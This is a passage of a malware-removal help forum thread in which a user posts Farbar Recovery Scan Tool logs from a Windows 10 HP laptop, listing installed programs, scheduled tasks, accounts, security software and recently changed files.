    2017-01-11 00:16 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\Provisioning
    2017-01-10 23:28 - 2016-09-23 16:25 - 00000000 ____D C:\WINDOWS\system32\MRT
    2017-01-10 23:25 - 2016-09-23 16:25 - 135657872 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
    2017-01-10 17:37 - 2016-09-22 19:47 - 00000000 ____D C:\ProgramData\Malwarebytes
    2017-01-08 21:19 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Adobe
    2017-01-08 20:09 - 2016-10-29 21:27 - 00000000 ____D C:\Program Files\Adobe
    2017-01-08 20:02 - 2016-10-29 21:33 - 00000000 ____D C:\ProgramData\regid.1986-12.com.adobe
    2017-01-08 19:54 - 2016-10-29 21:14 - 00000000 __RHD C:\Users\Joseph\[email protected] Creative Cloud Files
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001309 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk
    2017-01-08 19:52 - 2016-10-29 21:10 - 00001297 _____ C:\Users\Public\Desktop\Adobe Creative Cloud.lnk
    2017-01-08 19:49 - 2016-09-22 19:41 - 00000000 ____D C:\Users\Joseph\AppData\Local\VirtualStore
    2017-01-06 16:13 - 2016-09-29 08:57 - 00000000 ____D C:\Program Files (x86)\Intel
    2017-01-06 16:13 - 2016-09-22 19:54 - 00000000 ____D C:\ProgramData\Intel
    2017-01-06 16:11 - 2016-09-29 08:58 - 00000000 ____D C:\Program Files\Intel
    2017-01-02 18:29 - 2016-10-02 22:40 - 00046599 _____ C:\Users\Joseph\Desktop\Expense Tracking.xlsx

    ==================== Files in the root of some directories =======

    2017-01-31 23:27 - 2017-01-31 23:27 - 0000017 _____ () C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-02-01 08:27 - 2017-02-01 08:27 - 0047353 _____ () C:\ProgramData\agent.1485955633.bdinstall.bin
    2016-11-30 08:18 - 2016-11-30 08:18 - 0000057 _____ () C:\ProgramData\Ament.ini
    2017-02-01 08:47 - 2017-02-01 08:47 - 0403991 _____ () C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:52 - 2017-02-01 08:52 - 0056949 _____ () C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 16:52 - 2017-02-01 16:52 - 0040137 _____ () C:\ProgramData\dm.1485985887.bdinstall.bin
    2016-11-09 10:48 - 2017-01-15 15:45 - 0000479 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc

    ==================== Bamital & volsnap ======================

    (There is no automatic fix for files that do not pass verification.)

    C:\WINDOWS\system32\winlogon.exe => File is digitally signed
    C:\WINDOWS\system32\wininit.exe => File is digitally signed
    C:\WINDOWS\explorer.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
    C:\WINDOWS\system32\svchost.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
    C:\WINDOWS\system32\services.exe => File is digitally signed
    C:\WINDOWS\system32\User32.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
    C:\WINDOWS\system32\userinit.exe => File is digitally signed
    C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
    C:\WINDOWS\system32\rpcss.dll => File is digitally signed
    C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
    C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
    C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

    LastRegBack: 2017-01-23 10:44

    ==================== End of FRST.txt ===========================


    • 0

    #7
    mw201

    mw201

      Member

    • Topic Starter
    • Member
    • PipPip
    • 15 posts

    addition:

     

    Additional scan result of Farbar Recovery Scan Tool (x64) Version: 29-01-2017
    Ran by Joseph (01-02-2017 21:32:05)
    Running from C:\Users\Joseph\Downloads
    Windows 10 Home Version 1607 (X64) (2016-09-29 14:26:58)
    Boot Mode: Normal
    ==========================================================


    ==================== Accounts: =============================

    Administrator (S-1-5-21-2731509489-3924948741-1415746157-500 - Administrator - Disabled)
    DefaultAccount (S-1-5-21-2731509489-3924948741-1415746157-503 - Limited - Disabled)
    Guest (S-1-5-21-2731509489-3924948741-1415746157-501 - Limited - Disabled)
    Joseph (S-1-5-21-2731509489-3924948741-1415746157-1001 - Administrator - Enabled) => C:\Users\Joseph

    ==================== Security Center ========================

    (If an entry is included in the fixlist, it will be removed.)

    AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    AV: Bitdefender Antivirus (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
    AS: Bitdefender Antispyware (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
    AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}

    ==================== Installed Programs ======================

    (Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

    12 Labours of Hercules III: Girl Power (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.5.353 - Adobe Systems Incorporated)
    Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.8 - Adobe Systems Incorporated)
    Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.5.195 - Adobe Systems, Inc.)
    Awakening: The Dreamless Castle (x32 Version: 3.0.2.51 - WildTangent) Hidden
    Azkend 2: The World Beneath (x32 Version: 2.2.0.98 - WildTangent) Hidden
    Barn Yarn Collector's Edition (x32 Version: 3.0.2.48 - WildTangent) Hidden
    Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.21.970 - Bitdefender)
    Bitdefender Device Management (HKLM\...\Bitdefender Device Management) (Version: 21.0.23.1101 - Bitdefender)
    Bitdefender Total Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
    Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
    Citrix Receiver 4.5 (HKLM-x32\...\CitrixOnlinePluginPackWeb) (Version: 14.5.0.10018 - Citrix Systems, Inc.)
    CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.4.6527 - CyberLink Corp.)
    CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.6.4925 - CyberLink Corp.)
    CyberLink PowerDirector 12 (Version: 12.0.6.4925 - CyberLink Corp.) Hidden
    Delicious: Emily's Wonder Wedding Premium Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden
    Dropbox 25 GB (HKLM-x32\...\{736A97C6-8766-3699-84A9-71736C5E0CE3}) (Version: 3.1.11.0 - Dropbox, Inc.)
    Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
    Energy Star (HKLM\...\{5CB22648-35F8-41BC-9C35-1E41FE6E12A5}) (Version: 1.1.1 - HP Inc.)
    Entwined: The Perfect Murder (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
    Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
    Green City: Go South (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Home Makeover (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Hoyle Illusions Mahjongg (x32 Version: 3.0.2.59 - WildTangent) Hidden
    HP 3D DriveGuard (HKLM-x32\...\{E8D0E2B8-B64B-44BC-8E01-00DDACBDF78A}) (Version: 6.0.28.1 - Hewlett-Packard Company)
    HP CoolSense (HKLM-x32\...\{0C723C74-62DF-4B35-9490-A207546D866D}) (Version: 2.21.4 - HP Inc.)
    HP Documentation (HKLM\...\HP_Documentation) (Version: 1.0.0.1 - HP Inc.)
    HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
    HP Photosmart 6520 series Basic Device Software (HKLM\...\{1151BCF8-3246-4E34-9C17-22E66318C41C}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Photosmart 6520 series Help (HKLM-x32\...\{D3293275-1002-41F5-BC37-099B4251FF5B}) (Version: 28.0.0 - Hewlett Packard)
    HP Photosmart 6520 series Product Improvement Study (HKLM\...\{F144E07C-4019-4092-BE25-B57819C97D2F}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
    HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8318.5320 - Hewlett-Packard)
    HP Support Assistant (HKLM-x32\...\{78E2C850-ADA6-420D-BA35-2F4A9BE733CC}) (Version: 8.3.50.9 - HP)
    HP Support Solutions Framework (HKLM-x32\...\{5F084DD8-AF2C-4004-9C92-820C32E4BD55}) (Version: 12.5.32.203 - HP)
    HP Sure Connect (HKLM-x32\...\{6468C4A5-E47E-405F-B675-A70A70983EA6}) (Version: 1.0.0.27 - HP Inc.)
    HP System Event Utility (HKLM-x32\...\{09D0DB68-90EA-4015-983E-A0BD777D5A02}) (Version: 1.4.10 - HP Inc.)
    HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
    HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
    HP Wireless Button Driver (HKLM-x32\...\{AF4C5F64-4E6A-438B-9832-8BDEE0E7B43D}) (Version: 1.1.17.1 - HP)
    IGT Slots Fire Rubies (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Imperial Island: Birth of an Empire (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Intel® Chipset Device Software (x32 Version: 10.1.1.9 - Intel® Corporation) Hidden
    Intel® Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10608.329 - Intel Corporation)
    Intel® Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.2.1183 - Intel Corporation)
    Intel® PRO/Wireless Driver (HKLM\...\{edcc2d98-dba0-4914-ba46-6dae7352cea9}) (Version: 19.20.0000.5007 - Intel Corporation)
    Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4454 - Intel Corporation)
    Intel® Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.8.0.1042 - Intel Corporation)
    Intel® WiDi (HKLM\...\{6B15F1EF-F3A8-4C29-BF9E-18EB3683A83D}) (Version: 6.0.60.0 - Intel Corporation)
    Intel® WiDi Software Asset Manager (x32 Version: 3.2.1184 - Intel Corporation) Hidden
    Intel® Wireless Bluetooth® (HKLM-x32\...\{3920BCB0-23AA-4D0D-93E5-404692DAF9D2}) (Version: 19.00.1621.3340 - Intel Corporation)
    Intel® PROSet/Wireless Software (HKLM-x32\...\{d5572863-793c-4ec8-872a-43cccc68b948}) (Version: 18.40.0 - Intel Corporation)
    Jewel Match Snowscapes (x32 Version: 3.0.2.118 - WildTangent) Hidden
    Little Boy: Walter's Scooter (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Lost Souls: Timeless Fables Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Magic Heroes: Save Our Park (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
    Manor Memoirs Collector's Edition (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Microsoft Office 365 - en-us (HKLM\...\O365HomePremRetail - en-us) (Version: 16.0.7571.2109 - Microsoft Corporation)
    Microsoft Office Home and Student 2010 (HKLM\...\Office14.SingleImage) (Version: 14.0.7015.1000 - Microsoft Corporation)
    Microsoft OneDrive (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\OneDriveSetup.exe) (Version: 17.3.6743.1212 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
    Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
    Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.23918 (HKLM-x32\...\{2e085fd2-a3e4-4b39-8e10-6b8d35f55244}) (Version: 14.0.23918.0 - Microsoft Corporation)
    Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
    Mozilla Firefox 51.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 51.0.1 (x86 en-US)) (Version: 51.0.1 - Mozilla)
    Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 51.0.1 - Mozilla)
    Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Licensing Component (Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7571.2109 - Microsoft Corporation) Hidden
    Online Plug-in (x32 Version: 14.5.0.10018 - Citrix Systems, Inc.) Hidden
    Plagiarii (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Polar Bowler 1st Frame (x32 Version: 3.0.2.59 - WildTangent) Hidden
    PuppetShow: Return to Joyville (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Pyro Jump (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10586.21287 - Realtek Semiconduct Corp.)
    Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.6.1001.2015 - Realtek)
    Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.8004 - Realtek Semiconductor Corp.)
    Regency Solitaire (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Runefall (x32 Version: 3.0.2.126 - WildTangent) Hidden
    Rush Hour! Gas Station (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Self-service Plug-in (x32 Version: 4.5.0.14155 - Citrix Systems, Inc.) Hidden
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-003D-0000-1000-0000000FF1CE}_Office14.SingleImage_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version:  - Microsoft)
    Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version:  - Microsoft) Hidden
    Sky High Farm (x32 Version: 3.0.2.59 - WildTangent) Hidden
    Skype™ 7.31 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.31.104 - Skype Technologies S.A.)
    swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
    Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.37 - Synaptics Incorporated)
    Tasty Blue (x32 Version: 3.0.2.59 - WildTangent) Hidden
    The Far Kingdoms (x32 Version: 1.1.2.4 - WildTangent) Hidden
    TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
    Update Installer for WildTangent Games App (x32 Version:  - WildTangent) Hidden
    UserTesting (HKU\S-1-5-21-2731509489-3924948741-1415746157-1001\...\UserTestingPlugin) (Version:  - UserTesting.com)
    VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
    WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.1.0.28 - WildTangent)
    WildTangent Games App for HP (x32 Version: 4.1.1.2 - WildTangent) Hidden

    ==================== Custom CLSID (Whitelisted): ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    CustomCLSID: HKU\S-1-5-21-2731509489-3924948741-1415746157-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)

    ==================== Scheduled Tasks (Whitelisted) =============

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    Task: {00DA6CEA-186D-4563-AC42-5D9024D5EE93} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {020EC6C1-8FC5-4E00-8AA3-DEEFEF76BC4F} - System32\Tasks\IUM-F1E24CA0-B63E-4F13-A9E3-4ADE3BFF3473 => C:\Program Files (x86)\Intel\Intel® Update Manager\bin\iumsvc.exe
    Task: {02741E5B-6CB0-4785-8138-B76C8FFECD36} - System32\Tasks\AdobeAAMUpdater-1.0-LAPTOP-Q6I7UJ7H-Joseph => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
    Task: {037E6CC1-F2A7-4570-94C3-34EFFF7FEF81} - System32\Tasks\HPCeeScheduleForJoseph => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2016-01-22] (Hewlett-Packard)
    Task: {0D314300-9FF5-4A1E-8A6E-02DAC03B2F5A} - System32\Tasks\Microsoft\Office\Office Automatic Updates => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {28815AC6-2D9D-4DB2-9B9B-C15782F58F17} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {2B726BAB-E9B6-4B18-A788-E1550EBC27D3} - System32\Tasks\HPCustParticipation HP Photosmart 6520 series => C:\Program Files\HP\HP Photosmart 6520 series\Bin\HPCustPartic.exe [2012-10-17] (Hewlett-Packard Co.)
    Task: {2CA50760-ECC6-4AE8-ABC0-7786D4ABD805} - System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864 => C:\Program Files\Bitdefender Agent\WatchDog.exe [2016-10-21] (Bitdefender)
    Task: {31E6B1DE-6E6C-4EC4-BF0D-F5B3822B798F} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> No File <==== ATTENTION
    Task: {334761BD-5E77-4258-B1B3-3EBE4E9225C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-12-21] (HP Inc.)
    Task: {49F9DD57-0D8B-44AC-B3D2-0E9318CE1D6F} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2016-12-28] (Microsoft Corporation)
    Task: {4A95B853-DC77-486C-853C-03F94CAE8DE7} - System32\Tasks\Intel\Intel Telemetry 2 => C:\Program Files\Intel\Telemetry 2.0\lrio.exe [2015-06-05] (Intel Corporation)
    Task: {56B055C5-6236-4075-A0A4-E2627BB3183B} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {5C39963E-E07B-4DD3-BE48-6B43D7E7C731} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {5F53EEE8-4920-4181-806B-2DE65B82BAD7} - System32\Tasks\{832C82D8-6868-4CD7-AF1B-10388CE0E534} => Chrome.exe hxxp://ui.skype.com/ui/0/7.27.0.101/en/abandoninstall?source=lightinstaller&amp;page=tsInstall
    Task: {6EEBD8FF-375F-4F22-AA35-1697FE268304} - System32\Tasks\HP\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\HP\HP CoolSense\CoolSense.exe [2016-01-21] (HP Development Company, L.P.)
    Task: {794EC38E-0A13-4104-86A7-8F27C70DA1BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
    Task: {7A53628B-0D5A-4368-AD0B-4DF307943007} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {891256ED-2188-45B6-9656-46B60828F7EB} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\Joseph\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
    Task: {89D2A8B6-4765-4DCA-85AD-7596FECFB286} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_DeviceScan => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {8EBEC732-67C6-4823-8F6D-D49219079BB5} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2016-11-04] (Dropbox, Inc.)
    Task: {963EEFD3-C066-4DFC-B419-A76DB6073FFB} - System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C => C:\Program Files\Bitdefender\Bitdefender 2017\bdagent.exe [2017-01-03] (Bitdefender)
    Task: {9F965779-1CB2-4D42-BC03-7B29DC26B7B7} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_TH45U581RP => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
    Task: {A6F5043F-81F4-4E57-B0B6-BF0997939F31} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2016-09-22] (Google Inc.)
    Task: {AE327D73-DB64-440F-9FF4-02DC16AA63C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-11-07] (HP Inc.)
    Task: {B25BDC00-270D-45CD-8FF5-1E12386E6D52} - System32\Tasks\HPDAS => C:\Program [Argument = Files\HP\HP ePrint\HP.DeliveryAndStatus.Desktop.App.exe /CheckJobs]
    Task: {B787AC15-AED2-454D-A6A1-3EDF53CA38BA} - System32\Tasks\IntelWiDi-Upgrade-91ba0caa-28a7-4f47-8d08-f71b4b10fbec-Logon => C:\Program Files (x86)\Intel Corporation\Intel WiDi\Intel® Software Asset Manager\bin\IntelSoftwareAssetManagerService.exe [2015-09-17] (Intel Corporation)
    Task: {BB173364-607B-493A-935B-E5D7832968E5} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2017-01-28] (AVAST Software)
    Task: {E5AF5C26-359C-43CC-BF3F-29807CD26CDD} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-04-04] ()
    Task: {EF0F5F72-921B-416D-89FD-4102E543E277} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2016-12-15] (HP Inc.)
    Task: {F3EA5147-1530-4527-9731-26F30F8AE0E1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
    Task: {F4CC15E9-94C3-43C0-A478-E0AE034F0175} - System32\Tasks\Intel PTT EK Recertification => C:\Program Files\Intel\iCLS Client\IntelPTTEKRecertification.exe [2016-01-14] (Intel® Corporation)

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
    Task: C:\WINDOWS\Tasks\HPCeeScheduleForJoseph.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

    ==================== Shortcuts =============================

    (The entries could be listed to be restored or removed.)

    ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\HP\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square

    ==================== Loaded Modules (Whitelisted) ==============

    2016-07-16 06:42 - 2016-07-16 06:42 - 00231424 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
    2016-12-13 20:34 - 2016-12-09 05:29 - 02681200 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
    2017-02-01 08:44 - 2013-09-03 14:29 - 00111832 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\bdmetrics.dll
    2017-02-01 08:44 - 2016-11-14 16:52 - 01008448 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpbr.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 00541952 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpdsp.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 03202816 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttpph.mdl
    2017-02-01 08:44 - 2016-11-14 16:52 - 01542976 _____ () C:\Program Files\Bitdefender\Bitdefender 2017\otengines_001_001\ashttprbl.mdl
